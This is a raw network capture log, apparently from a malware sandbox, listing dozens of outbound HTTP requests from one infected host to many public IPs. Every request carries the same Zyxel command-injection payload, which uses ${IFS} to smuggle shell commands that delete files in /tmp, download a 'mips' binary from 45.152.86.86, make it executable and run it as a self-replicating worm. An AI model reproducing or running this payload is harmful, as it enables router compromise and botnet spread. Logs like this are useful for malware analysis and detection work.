                              Mar 31, 2024 08:41:14.658086061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2423192.168.2.1345694131.37.70.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.658114910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2424192.168.2.1342806198.12.242.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.658162117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2425192.168.2.133665874.45.169.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.658211946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2426192.168.2.134913676.113.134.139443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.658238888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2427192.168.2.1338428156.123.40.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.658272028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2428192.168.2.134211084.21.117.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.658333063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2429192.168.2.135324224.139.177.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.658391953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2430192.168.2.1359476140.114.45.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.658431053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2431192.168.2.1355942149.44.213.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.658495903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2432192.168.2.136087485.255.169.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.658545971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2433192.168.2.135577474.12.22.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.658581972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2434192.168.2.1339112175.35.175.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.658637047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2435192.168.2.133993891.222.177.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.658699036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2436192.168.2.135144470.126.146.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.658766031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2437192.168.2.1348866166.122.196.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.658816099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2438192.168.2.1334606208.203.14.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.658857107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2439192.168.2.1350156222.8.51.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.658902884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2440192.168.2.1337736168.134.89.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.658976078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2441192.168.2.1351092158.2.144.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.659029007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2442192.168.2.1333962137.54.114.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.659059048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2443192.168.2.13381681.96.167.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.659146070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2444192.168.2.135192846.232.12.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.659178972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2445192.168.2.133648818.103.166.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.659228086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2446192.168.2.1356166174.86.182.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.659265995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2447192.168.2.1340882218.45.119.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.659311056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2448192.168.2.1339812120.255.179.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.659385920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2449192.168.2.1349594157.148.243.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.659424067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2450192.168.2.1345964155.150.62.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.659468889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2451192.168.2.1359790137.125.76.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.659532070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2452192.168.2.1350230140.249.227.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.659569979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2453192.168.2.135262047.205.236.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.659603119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2454192.168.2.1350456111.122.18.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.659668922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2455192.168.2.1347652218.6.6.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.659696102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2456192.168.2.1349504123.146.102.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.659719944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2457192.168.2.1356588165.109.93.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.659778118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2458192.168.2.1350042170.210.204.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.659818888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2459192.168.2.13436745.196.78.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.659866095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2460192.168.2.13494261.80.204.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.659914970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2461192.168.2.135939868.212.168.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.659943104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2462192.168.2.134998818.13.57.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.660002947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2463192.168.2.1336002197.75.215.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.660048962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2464192.168.2.134859472.172.119.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.660098076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2465192.168.2.1359824163.43.236.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.660140991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2466192.168.2.1354382156.180.75.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.660186052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2467192.168.2.1334750171.34.98.206443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.660248995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2468192.168.2.1350122172.233.153.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.660298109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2469192.168.2.135252841.214.172.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.660329103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2470192.168.2.134488219.146.198.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.660393953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2471192.168.2.1355506129.11.145.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.660423040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2472192.168.2.134236617.31.232.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.660460949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2473192.168.2.134719250.81.34.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.660527945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2474192.168.2.1356148137.177.37.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.660582066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2475192.168.2.133497882.42.252.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.660641909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2476192.168.2.1357108112.234.94.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.660690069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2477192.168.2.134338052.250.67.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.660747051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2478192.168.2.1348174143.255.62.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.660799026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2479192.168.2.134587438.32.29.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.660856009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2480192.168.2.1337782222.77.170.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.660896063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2481192.168.2.133781288.156.90.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.660947084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2482192.168.2.134858213.254.150.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.661005020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2483192.168.2.1359478160.73.143.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.661046982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2484192.168.2.134627414.82.111.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.661104918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2485192.168.2.135387088.4.121.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.661173105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2486192.168.2.133345088.243.239.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.661216021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2487192.168.2.1343576221.11.210.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.661259890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2488192.168.2.1342408213.90.131.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.661318064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2489192.168.2.133281684.58.90.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.661364079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2490192.168.2.134551451.185.78.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.661401033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2491192.168.2.134308065.51.69.74443
                              TimestampBytes transferredDirectionData
